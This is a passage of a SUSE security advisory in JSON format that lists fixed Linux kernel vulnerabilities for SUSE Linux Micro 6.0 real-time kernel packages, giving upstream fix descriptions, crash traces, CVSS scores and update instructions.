"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68254",
"url": "https://www.suse.com/security/cve/CVE-2025-68254"
},
{
"category": "external",
"summary": "SUSE Bug 1255140 for CVE-2025-68254",
"url": "https://bugzilla.suse.com/1255140"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68254"
},
{
"cve": "CVE-2025-68255",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68255"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nstaging: rtl8723bs: fix stack buffer overflow in OnAssocReq IE parsing\n\nThe Supported Rates IE length from an incoming Association Request frame\nwas used directly as the memcpy() length when copying into a fixed-size\n16-byte stack buffer (supportRate). A malicious station can advertise an\nIE length larger than 16 bytes, causing a stack buffer overflow.\n\nClamp ie_len to the buffer size before copying the Supported Rates IE,\nand correct the bounds check when merging Extended Supported Rates to\nprevent a second potential overflow.\n\nThis prevents kernel stack corruption triggered by malformed association\nrequests.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68255",
"url": "https://www.suse.com/security/cve/CVE-2025-68255"
},
{
"category": "external",
"summary": "SUSE Bug 1255395 for CVE-2025-68255",
"url": "https://bugzilla.suse.com/1255395"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68255"
},
{
"cve": "CVE-2025-68256",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68256"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nstaging: rtl8723bs: fix out-of-bounds read in rtw_get_ie() parser\n\nThe Information Element (IE) parser rtw_get_ie() trusted the length\nbyte of each IE without validating that the IE body (len bytes after\nthe 2-byte header) fits inside the remaining frame buffer. A malformed\nframe can advertise an IE length larger than the available data, causing\nthe parser to increment its pointer beyond the buffer end. This results\nin out-of-bounds reads or, depending on the pattern, an infinite loop.\n\nFix by validating that (offset + 2 + len) does not exceed the limit\nbefore accepting the IE or advancing to the next element.\n\nThis prevents OOB reads and ensures the parser terminates safely on\nmalformed frames.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68256",
"url": "https://www.suse.com/security/cve/CVE-2025-68256"
},
{
"category": "external",
"summary": "SUSE Bug 1255138 for CVE-2025-68256",
"url": "https://bugzilla.suse.com/1255138"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68256"
},
{
"cve": "CVE-2025-68257",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68257"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncomedi: check device\u0027s attached status in compat ioctls\n\nSyzbot identified an issue [1] that crashes kernel, seemingly due to\nunexistent callback dev-\u003eget_valid_routes(). By all means, this should\nnot occur as said callback must always be set to\nget_zero_valid_routes() in __comedi_device_postconfig().\n\nAs the crash seems to appear exclusively in i386 kernels, at least,\njudging from [1] reports, the blame lies with compat versions\nof standard IOCTL handlers. Several of them are modified and\ndo not use comedi_unlocked_ioctl(). While functionality of these\nioctls essentially copy their original versions, they do not\nhave required sanity check for device\u0027s attached status. This,\nin turn, leads to a possibility of calling select IOCTLs on a\ndevice that has not been properly setup, even via COMEDI_DEVCONFIG.\n\nDoing so on unconfigured devices means that several crucial steps\nare missed, for instance, specifying dev-\u003eget_valid_routes()\ncallback.\n\nFix this somewhat crudely by ensuring device\u0027s attached status before\nperforming any ioctls, improving logic consistency between modern\nand compat functions.\n\n[1] Syzbot report:\nBUG: kernel NULL pointer dereference, address: 0000000000000000\n...\nCR2: ffffffffffffffd6 CR3: 000000006c717000 CR4: 0000000000352ef0\nCall Trace:\n \u003cTASK\u003e\n get_valid_routes drivers/comedi/comedi_fops.c:1322 [inline]\n parse_insn+0x78c/0x1970 drivers/comedi/comedi_fops.c:1401\n do_insnlist_ioctl+0x272/0x700 drivers/comedi/comedi_fops.c:1594\n compat_insnlist drivers/comedi/comedi_fops.c:3208 [inline]\n comedi_compat_ioctl+0x810/0x990 drivers/comedi/comedi_fops.c:3273\n __do_compat_sys_ioctl fs/ioctl.c:695 [inline]\n __se_compat_sys_ioctl fs/ioctl.c:638 [inline]\n __ia32_compat_sys_ioctl+0x242/0x370 fs/ioctl.c:638\n do_syscall_32_irqs_on arch/x86/entry/syscall_32.c:83 [inline]\n...",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68257",
"url": "https://www.suse.com/security/cve/CVE-2025-68257"
},
{
"category": "external",
"summary": "SUSE Bug 1255167 for CVE-2025-68257",
"url": "https://bugzilla.suse.com/1255167"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68257"
},
{
"cve": "CVE-2025-68258",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68258"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncomedi: multiq3: sanitize config options in multiq3_attach()\n\nSyzbot identified an issue [1] in multiq3_attach() that induces a\ntask timeout due to open() or COMEDI_DEVCONFIG ioctl operations,\nspecifically, in the case of multiq3 driver.\n\nThis problem arose when syzkaller managed to craft weird configuration\noptions used to specify the number of channels in encoder subdevice.\nIf a particularly great number is passed to s-\u003en_chan in\nmultiq3_attach() via it-\u003eoptions[2], then multiple calls to\nmultiq3_encoder_reset() at the end of driver-specific attach() method\nwill be running for minutes, thus blocking tasks and affected devices\nas well.\n\nWhile this issue is most likely not too dangerous for real-life\ndevices, it still makes sense to sanitize configuration inputs. Enable\na sensible limit on the number of encoder chips (4 chips max, each\nwith 2 channels) to stop this behaviour from manifesting.\n\n[1] Syzbot crash:\nINFO: task syz.2.19:6067 blocked for more than 143 seconds.\n...\nCall Trace:\n \u003cTASK\u003e\n context_switch kernel/sched/core.c:5254 [inline]\n __schedule+0x17c4/0x4d60 kernel/sched/core.c:6862\n __schedule_loop kernel/sched/core.c:6944 [inline]\n schedule+0x165/0x360 kernel/sched/core.c:6959\n schedule_preempt_disabled+0x13/0x30 kernel/sched/core.c:7016\n __mutex_lock_common kernel/locking/mutex.c:676 [inline]\n __mutex_lock+0x7e6/0x1350 kernel/locking/mutex.c:760\n comedi_open+0xc0/0x590 drivers/comedi/comedi_fops.c:2868\n chrdev_open+0x4cc/0x5e0 fs/char_dev.c:414\n do_dentry_open+0x953/0x13f0 fs/open.c:965\n vfs_open+0x3b/0x340 fs/open.c:1097\n...",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68258",
"url": "https://www.suse.com/security/cve/CVE-2025-68258"
},
{
"category": "external",
"summary": "SUSE Bug 1255182 for CVE-2025-68258",
"url": "https://bugzilla.suse.com/1255182"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68258"
},
{
"cve": "CVE-2025-68259",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68259"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nKVM: SVM: Don\u0027t skip unrelated instruction if INT3/INTO is replaced\n\nWhen re-injecting a soft interrupt from an INT3, INT0, or (select) INTn\ninstruction, discard the exception and retry the instruction if the code\nstream is changed (e.g. by a different vCPU) between when the CPU\nexecutes the instruction and when KVM decodes the instruction to get the\nnext RIP.\n\nAs effectively predicted by commit 6ef88d6e36c2 (\"KVM: SVM: Re-inject\nINT3/INTO instead of retrying the instruction\"), failure to verify that\nthe correct INTn instruction was decoded can effectively clobber guest\nstate due to decoding the wrong instruction and thus specifying the\nwrong next RIP.\n\nThe bug most often manifests as \"Oops: int3\" panics on static branch\nchecks in Linux guests. Enabling or disabling a static branch in Linux\nuses the kernel\u0027s \"text poke\" code patching mechanism. To modify code\nwhile other CPUs may be executing that code, Linux (temporarily)\nreplaces the first byte of the original instruction with an int3 (opcode\n0xcc), then patches in the new code stream except for the first byte,\nand finally replaces the int3 with the first byte of the new code\nstream. If a CPU hits the int3, i.e. executes the code while it\u0027s being\nmodified, then the guest kernel must look up the RIP to determine how to\nhandle the #BP, e.g. by emulating the new instruction. If the RIP is\nincorrect, then this lookup fails and the guest kernel panics.\n\nThe bug reproduces almost instantly by hacking the guest kernel to\nrepeatedly check a static branch[1] while running a drgn script[2] on\nthe host to constantly swap out the memory containing the guest\u0027s TSS.\n\n[1]: https://gist.github.com/osandov/44d17c51c28c0ac998ea0334edf90b5a\n[2]: https://gist.github.com/osandov/10e45e45afa29b11e0c7209247afc00b",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68259",
"url": "https://www.suse.com/security/cve/CVE-2025-68259"
},
{
"category": "external",
"summary": "SUSE Bug 1255199 for CVE-2025-68259",
"url": "https://bugzilla.suse.com/1255199"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68259"
},
{
"cve": "CVE-2025-68261",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68261"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: add i_data_sem protection in ext4_destroy_inline_data_nolock()\n\nFix a race between inline data destruction and block mapping.\n\nThe function ext4_destroy_inline_data_nolock() changes the inode data\nlayout by clearing EXT4_INODE_INLINE_DATA and setting EXT4_INODE_EXTENTS.\nAt the same time, another thread may execute ext4_map_blocks(), which\ntests EXT4_INODE_EXTENTS to decide whether to call ext4_ext_map_blocks()\nor ext4_ind_map_blocks().\n\nWithout i_data_sem protection, ext4_ind_map_blocks() may receive inode\nwith EXT4_INODE_EXTENTS flag and triggering assert.\n\nkernel BUG at fs/ext4/indirect.c:546!\nEXT4-fs (loop2): unmounting filesystem.\ninvalid opcode: 0000 [#1] PREEMPT SMP KASAN NOPTI\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.12.0-1 04/01/2014\nRIP: 0010:ext4_ind_map_blocks.cold+0x2b/0x5a fs/ext4/indirect.c:546\n\nCall Trace:\n \u003cTASK\u003e\n ext4_map_blocks+0xb9b/0x16f0 fs/ext4/inode.c:681\n _ext4_get_block+0x242/0x590 fs/ext4/inode.c:822\n ext4_block_write_begin+0x48b/0x12c0 fs/ext4/inode.c:1124\n ext4_write_begin+0x598/0xef0 fs/ext4/inode.c:1255\n ext4_da_write_begin+0x21e/0x9c0 fs/ext4/inode.c:3000\n generic_perform_write+0x259/0x5d0 mm/filemap.c:3846\n ext4_buffered_write_iter+0x15b/0x470 fs/ext4/file.c:285\n ext4_file_write_iter+0x8e0/0x17f0 fs/ext4/file.c:679\n call_write_iter include/linux/fs.h:2271 [inline]\n do_iter_readv_writev+0x212/0x3c0 fs/read_write.c:735\n do_iter_write+0x186/0x710 fs/read_write.c:861\n vfs_iter_write+0x70/0xa0 fs/read_write.c:902\n iter_file_splice_write+0x73b/0xc90 fs/splice.c:685\n do_splice_from fs/splice.c:763 [inline]\n direct_splice_actor+0x10f/0x170 fs/splice.c:950\n splice_direct_to_actor+0x33a/0xa10 fs/splice.c:896\n do_splice_direct+0x1a9/0x280 fs/splice.c:1002\n do_sendfile+0xb13/0x12c0 fs/read_write.c:1255\n __do_sys_sendfile64 fs/read_write.c:1323 [inline]\n __se_sys_sendfile64 fs/read_write.c:1309 [inline]\n __x64_sys_sendfile64+0x1cf/0x210 fs/read_write.c:1309\n do_syscall_x64 arch/x86/entry/common.c:51 [inline]\n do_syscall_64+0x35/0x80 arch/x86/entry/common.c:81\n entry_SYSCALL_64_after_hwframe+0x6e/0xd8",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68261",
"url": "https://www.suse.com/security/cve/CVE-2025-68261"
},
{
"category": "external",
"summary": "SUSE Bug 1255164 for CVE-2025-68261",
"url": "https://bugzilla.suse.com/1255164"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68261"
},
{
"cve": "CVE-2025-68264",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68264"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: refresh inline data size before write operations\n\nThe cached ei-\u003ei_inline_size can become stale between the initial size\ncheck and when ext4_update_inline_data()/ext4_create_inline_data() use\nit. Although ext4_get_max_inline_size() reads the correct value at the\ntime of the check, concurrent xattr operations can modify i_inline_size\nbefore ext4_write_lock_xattr() is acquired.\n\nThis causes ext4_update_inline_data() and ext4_create_inline_data() to\nwork with stale capacity values, leading to a BUG_ON() crash in\next4_write_inline_data():\n\n kernel BUG at fs/ext4/inline.c:1331!\n BUG_ON(pos + len \u003e EXT4_I(inode)-\u003ei_inline_size);\n\nThe race window:\n1. ext4_get_max_inline_size() reads i_inline_size = 60 (correct)\n2. Size check passes for 50-byte write\n3. [Another thread adds xattr, i_inline_size changes to 40]\n4. ext4_write_lock_xattr() acquires lock\n5. ext4_update_inline_data() uses stale i_inline_size = 60\n6. Attempts to write 50 bytes but only 40 bytes actually available\n7. BUG_ON() triggers\n\nFix this by recalculating i_inline_size via ext4_find_inline_data_nolock()\nimmediately after acquiring xattr_sem. This ensures ext4_update_inline_data()\nand ext4_create_inline_data() work with current values that are protected\nfrom concurrent modifications.\n\nThis is similar to commit a54c4613dac1 (\"ext4: fix race writing to an\ninline_data file while its xattrs are changing\") which fixed i_inline_off\nstaleness. This patch addresses the related i_inline_size staleness issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68264",
"url": "https://www.suse.com/security/cve/CVE-2025-68264"
},
{
"category": "external",
"summary": "SUSE Bug 1255380 for CVE-2025-68264",
"url": "https://bugzilla.suse.com/1255380"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68264"
},
{
"cve": "CVE-2025-68283",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68283"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: replace BUG_ON with bounds check for map-\u003emax_osd\n\nOSD indexes come from untrusted network packets. Boundary checks are\nadded to validate these against map-\u003emax_osd.\n\n[ idryomov: drop BUG_ON in ceph_get_primary_affinity(), minor cosmetic\n edits ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68283",
"url": "https://www.suse.com/security/cve/CVE-2025-68283"
},
{
"category": "external",
"summary": "SUSE Bug 1255379 for CVE-2025-68283",
"url": "https://bugzilla.suse.com/1255379"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68283"
},
{
"cve": "CVE-2025-68284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68284"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: prevent potential out-of-bounds writes in handle_auth_session_key()\n\nThe len field originates from untrusted network packets. Boundary\nchecks have been added to prevent potential out-of-bounds writes when\ndecrypting the connection secret or processing service tickets.\n\n[ idryomov: changelog ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68284",
"url": "https://www.suse.com/security/cve/CVE-2025-68284"
},
{
"category": "external",
"summary": "SUSE Bug 1255377 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255377"
},
{
"category": "external",
"summary": "SUSE Bug 1255378 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255378"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
